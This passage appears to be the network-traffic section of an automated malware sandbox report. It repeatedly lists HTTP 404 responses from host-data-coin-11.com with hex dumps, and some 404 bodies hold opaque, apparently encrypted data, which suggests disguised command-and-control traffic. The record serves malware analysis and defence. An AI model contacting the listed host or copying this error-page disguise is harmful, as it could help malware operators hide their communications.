                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:29:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 